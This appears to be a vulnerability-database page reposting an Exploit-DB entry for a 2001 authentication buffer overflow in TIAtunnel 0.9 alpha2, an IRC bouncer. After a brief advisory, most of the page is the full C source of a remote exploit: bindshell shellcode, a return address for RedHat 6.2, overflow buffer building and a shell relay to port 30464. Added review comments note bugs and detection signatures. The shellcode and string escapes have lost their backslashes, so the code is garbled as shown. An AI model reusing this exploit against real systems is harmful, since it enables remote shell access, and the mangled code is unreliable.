PKCrew TIAtunnel 0.9 alpha2 – Authentication Mechanism Buffer Overflow


漏洞ID 1053536 漏洞类型
发布时间 2001-06-05 更新时间 2001-06-05
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20902
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/2831/info

TIAtunnel is a freely available IRC session bouncing software package. It is distributed by the pkcrew.

A problem in the software package makes it possible for a remote user to gain a local shell. Due to a buffer overflow in the authentication mechanism of TIAtunnel, it is possible for a remote user to overwrite variables on the stack, including the return address, and thus gain a remote shell.

Therefore, it is possible for a remote user to gain a local interactive shell with the permissions of the TIAtunnel process. 

/*  
 *  TIAtunnel-0.9alpha2 Linux x86 remote exploit
 *  by qitest1 - 5/06/2001
 *
 *  Shellcode is executed with the privileges of the program. I 
 *  noticed that with a simple execve() a shell was executed but its 
 *  IO was linked with the term where TIAtunnel was launched. This 
 *  is not a problem for us if we use a bindshell code.  
 *
 *  Greets: recidjvo->Tnx for this bug. And now you can really smile. 
 *	    Nail    ->Dear friend ;)		 
 *  Hmm.. 0x69 seems to strike again..
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RETPOS 		516		/* offset in mybuf at which do_mybuf() stores the return address */

/* One entry of the target table: `def` is the number accepted by -t (69 marks
 * the end of the table, see usage()), `descr` is the text printed for it, and
 * `retaddr` is the value do_mybuf() writes at mybuf + RETPOS. */
struct targ
{
   int                  def;
   char                 *descr;
   unsigned long int    retaddr;
};

/* Target table; the {69, NULL, 0} entry is the terminator usage() stops at. */
struct targ target[]=
    {                   
      {0, "RedHat 6.2 with TIAtunnel-0.9alpha2 from tar.gz", 0xbffff67c},
      {69, NULL, 0}
    };

/* Payload bytes, treated here as opaque; do_mybuf() copies strlen(shellcode)
 * of them into mybuf so that they end immediately before RETPOS. */
char shellcode[] =		/* bindshell at port 30464 */
  "x31xc0xb0x02xcdx80x85xc0x75x43xebx43x5ex31xc0"
  "x31xdbx89xf1xb0x02x89x06xb0x01x89x46x04xb0x06"
  "x89x46x08xb0x66xb3x01xcdx80x89x06xb0x02x66x89"
  "x46x0cxb0x77x66x89x46x0ex8dx46x0cx89x46x04x31"
  "xc0x89x46x10xb0x10x89x46x08xb0x66xb3x02xcdx80"
  "xebx04xebx55xebx5bxb0x01x89x46x04xb0x66xb3x04"
  "xcdx80x31xc0x89x46x04x89x46x08xb0x66xb3x05xcd"
  "x80x88xc3xb0x3fx31xc9xcdx80xb0x3fxb1x01xcdx80"
  "xb0x3fxb1x02xcdx80xb8x2fx62x69x6ex89x06xb8x2f"
  "x73x68x2fx89x46x04x31xc0x88x46x07x89x76x08x89"
  "x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31"
  "xc0xb0x01x31xdbxcdx80xe8x5bxffxffxff";

/* RETPOS bytes of filler + payload, 4 bytes of return address, a NUL written
 * by do_mybuf(), and one spare byte for the terminator strcat()ed in main(). */
char		mybuf[RETPOS + 4 + 1 + 1];

/* Forward declarations; the definitions follow main(). */
int             sockami(char *host, int port);		/* TCP connect to host:port; exits on failure */
void		do_mybuf(unsigned long retaddr);	/* fill mybuf around retaddr */
void		shellami(int sock);			/* interactive stdin/stdout <-> sock relay */
void            usage(char *progname);			/* print help and exit(1) */

/*
 * Entry point.  Parses -h/-p/-t/-o, connects to host:port, sends the single
 * line built by do_mybuf(), waits two seconds, then connects to port 30464
 * (the port named in the shellcode comment) and hands that socket to
 * shellami().
 *
 * Review notes on the code as written:
 *  - The return type is implicit int (pre-C99) and nothing is returned.
 *  - `i` and `offset` are assigned but never read.
 *  - `sel` only chooses the description that is printed; the address used is
 *    always target[0].retaddr.  `sel` is not range-checked, so an
 *    out-of-range -t reads past the target table.
 *  - The value added to the return address is atoi(argv[1]), i.e. the first
 *    command-line word.
 *  - The result of send() is not checked.
 *
 * Observable network behaviour (useful for detection): one line of
 * RETPOS + 4 bytes, mostly 0x90 filler, on the authentication connection,
 * followed about two seconds later by a second connection to TCP/30464 on
 * the same host.
 */
main(int argc, char **argv)
{
int 	i,			/* never read */
	sel = 0,		/* -t: index into target[] (used only for descr) */
	port = 0,		/* -p: TIAtunnel port; 0 means "not given" */
	offset = 0,		/* -o: parsed but never read */
	sock,			/* descriptor returned by sockami() */
        cnt;			/* current getopt() option character */
char 	*host = NULL;		/* -h: strdup()ed copy, never freed */

  printf("n  TIAtunnel-0.9alpha2 exploit by qitest1nn");
  
  if(argc == 1)
        usage(argv[0]);
  while((cnt = getopt(argc,argv,"h:p:t:o:")) != EOF)
    {
   switch(cnt)
        {
   case 'h':
     host = strdup(optarg);
     break;
   case 'p':
     port = atoi(optarg);
     break;
   case 't':
     sel = atoi(optarg);       
     break;
   case 'o':
     offset = atoi(optarg);
     break;
   default:
     usage(argv[0]);
     break;
        }
    }
  if(host == NULL)
        usage(argv[0]);
  if(port == 0)
	usage(argv[0]);

  /* target[sel] is read here without a bounds check against the table. */
  printf("+Host: %sn  as: %sn", host, target[sel].descr);
  printf("+Connecting to %s...n", host);
  sock = sockami(host, port);		/* exits the process on any failure */
  printf("  connectedn");

  /* argv[1] is the first option word on the command line, not the -o value. */
  target[0].retaddr += atoi(argv[1]);
  printf("+Building buffer with retaddr: %p...n", target[0].retaddr);
  do_mybuf(target[0].retaddr);
  strcat(mybuf, "n");			/* uses the spare byte reserved in mybuf's size */
  printf("  donen");
  send(sock, mybuf, strlen(mybuf), 0);	/* return value unchecked */
  printf("+Overflowing...n");

  printf("+Zzing...n");
  sleep(2);
  printf("+Getting shell...n");
  sock = sockami(host, 30464);  	/* 30464: port from the shellcode comment */
  shellami(sock);
}

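/*
 * Open a TCP connection to host:port and return the connected descriptor.
 *
 * host is resolved with gethostbyname().  Only an AF_INET answer whose
 * address length fits sin_addr is accepted, and the address is copied with
 * that bound so an unexpected h_length can never overrun the sockaddr.
 * Every failure is reported on stderr and ends the process with exit(-1),
 * as in the original: callers never see an error return.  The socket is
 * closed before exiting so no descriptor is leaked into exit handlers.
 *
 * Ownership of the returned descriptor passes to the caller.
 */
int
sockami(char *host, int port)
{
  struct sockaddr_in address;
  struct hostent *hp;
  int sock;

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock == -1)
    {
      perror("socket()");
      exit(-1);
    }

  hp = gethostbyname(host);
  if (hp == NULL)
    {
      /* gethostbyname() reports through h_errno, not errno, so perror()
       * would print an unrelated message here. */
      fprintf(stderr, "gethostbyname(): cannot resolve %s\n", host);
      close(sock);
      exit(-1);
    }
  if (hp->h_addrtype != AF_INET
      || hp->h_length < 0
      || (size_t) hp->h_length > sizeof(address.sin_addr)
      || hp->h_addr_list[0] == NULL)
    {
      fprintf(stderr, "gethostbyname(): %s did not resolve to an IPv4 address\n", host);
      close(sock);
      exit(-1);
    }

  memset(&address, 0, sizeof(address));
  /* Bounded by the check above: h_length <= sizeof sin_addr. */
  memcpy(&address.sin_addr, hp->h_addr_list[0], (size_t) hp->h_length);
  address.sin_family = AF_INET;
  address.sin_port = htons((unsigned short) port);

  if (connect(sock, (struct sockaddr *) &address, sizeof(address)) == -1)
    {
      perror("connect()");
      close(sock);
      exit(-1);
    }

  return sock;
}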

/*
 * Fill the file-scope mybuf: every byte set to 0x90 (x86 nop), shellcode
 * copied so that its last byte lands at mybuf[RETPOS - 1], retaddr stored at
 * mybuf + RETPOS, then a terminator at RETPOS + 4.
 *
 * Review notes: the store through `ret` assumes a 4-byte unsigned long
 * (32-bit build).  On an LP64 build it writes 8 bytes, which runs past the
 * end of mybuf (RETPOS + 6 bytes); it is also an unaligned, type-punned
 * store, for which memcpy() is the portable form.  The loop start is
 * RETPOS - strlen(shellcode), a size_t expression compared with the int `i`,
 * so it relies on strlen(shellcode) being at most RETPOS.
 */
void
do_mybuf(unsigned long int retaddr)
{
int		i,		/* write index into mybuf */
		n = 0;		/* read index into shellcode */
unsigned long 	*ret;		/* alias of mybuf + RETPOS */

  memset(mybuf, 0x90, sizeof(mybuf));
  for(i = RETPOS - strlen(shellcode); i < RETPOS; i++)
	{
          mybuf[i] = shellcode[n++];
	}
  ret = (unsigned long *) (mybuf + RETPOS);
  *ret = retaddr;
  mybuf[RETPOS + 4] = 'x00';
}

/*
 * Minimal interactive relay on an already-connected socket: sends `cmd`
 * once, then loops with select() copying socket data to stdout and stdin
 * data to the socket until the peer closes, at which point it exit(0)s.
 * The trailing `return` is never reached.
 *
 * Review notes: recvbuf is 1024 bytes and read() is allowed to fill all
 * 1024, after which recvbuf[n] = 0 writes one byte past the end (both read
 * sites).  The return values of select() and write() are not checked, and
 * printf("%s") stops at the first NUL byte received, so binary output is
 * truncated.
 */
void
shellami(int sock)
{
int             n;			/* byte count from the last read() */
char            recvbuf[1024];		/* staging buffer shared by both directions */
char            *cmd = "id; uname -an";	/* sent once before the loop */
fd_set          rset;			/* rebuilt on every iteration */

  send(sock, cmd, strlen(cmd), 0);

  while (1)
    {
      FD_ZERO(&rset);
      FD_SET(sock,&rset);
      FD_SET(STDIN_FILENO,&rset);
      select(sock+1,&rset,NULL,NULL,NULL);	/* result unchecked */
      if (FD_ISSET(sock,&rset))
        {
          n=read(sock,recvbuf,1024);
          if (n <= 0)
            {
              printf("Connection closed by foreign host.n");
              exit(0);
            }
          recvbuf[n]=0;				/* out of bounds when n == 1024 */
          printf("%s",recvbuf);
        }
      if (FD_ISSET(STDIN_FILENO,&rset))
        {
          n=read(STDIN_FILENO,recvbuf,1024);
          if (n>0)
            {
              recvbuf[n]=0;			/* out of bounds when n == 1024 */
              write(sock,recvbuf,n);		/* result unchecked */
            }
        }
    }
  return;
}

/*
 * Print the command-line synopsis and the list of known targets to stdout,
 * then terminate with exit(1).  Never returns.
 *
 * progname: argv[0], printed in the "Usage:" line.
 */
void
usage(char *progname)
{
  printf("Usage: %s [options]n", progname);
  fputs("Options:n"
        "  -h hostnamen"
        "  -p portn"
        "  -t targetn"
        "  -o offsetn"
        "Available targets:n", stdout);

  /* The table ends at the entry whose def is 69. */
  for (int idx = 0; target[idx].def != 69; idx++)
    {
      printf("  %d) %sn", target[idx].def, target[idx].descr);
    }

  exit(1);
}
